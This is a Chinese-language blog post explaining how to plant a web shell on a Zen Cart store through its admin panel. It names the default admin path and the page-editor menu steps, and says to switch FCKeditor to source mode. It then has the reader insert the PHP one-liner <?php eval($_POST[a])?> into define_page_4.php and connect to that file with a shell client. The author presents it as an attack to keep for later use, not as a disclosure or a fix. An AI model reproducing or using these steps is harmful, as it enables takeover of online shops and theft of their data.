首页 > Zencart > zencart任意系统后台拿shell

zencart任意系统后台拿shell

zencart系统目前是国内做外贸的朋友用最多的系统,但是他的1.38就爆过漏洞,不过1.39一直没听说有漏洞,前段日子发现黑面说有漏洞,看了他的文章,标记了一下,以后说不定能用到

ZEN CAER后台路径 没修改是 admin 爆原始地址 大家都知道我就不说了。
先进后台:先点– 工具 –页面编辑 –页面编辑: english ,

选择要编辑的文件

… define_checkout_success.php

define_conditions.php

define_contact_us.php

define_discount_coupon.php

define_main_page.php

define_page_2.php

define_page_3.php

define_page_4.php

define_page_not_found.php

define_privacy.php

define_shippinginfo.php

define_site_map.php

define_subscribe.php

define_unsubscribe.php

文本编辑器 纯文本 HTMLarea FCKeditor TinyMCE 这里选择FCKeditor 然后选择左面可编辑的文件名称 然后选择FCK的源代码编辑 因为其他编辑器是文本的,FCK支持源代码
不然你编辑文本文件拿不到shell。

注意: 你应该编辑位于当前模板目录中的文件, 例如: /languages/english/html_includes/
切记在修改文件后做好备份.

正在编辑的文件:
/home/cheapjer/public_html/includes/languages/english/html_includes/zcen/define_page_4.php 这里就是网站的原始地址了。
然后编辑插入一个 <?php eval($_POST[a])?> 我这里随便拿个一句话做示范 然后保存 然后 XXX.COM/includes/languages/english/html_includes/zcen/define_page_4.php 这里用客户端连接就可以了。

分类:Zencart 标签:, ,
  1. 还没有评论。
  1. No trackbacks yet.

发表评论

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / 更改 )

Twitter picture

You are commenting using your Twitter account. Log Out / 更改 )

Facebook photo

You are commenting using your Facebook account. Log Out / 更改 )

Google+ photo

You are commenting using your Google+ account. Log Out / 更改 )

Connecting to %s

%d 博主赞过: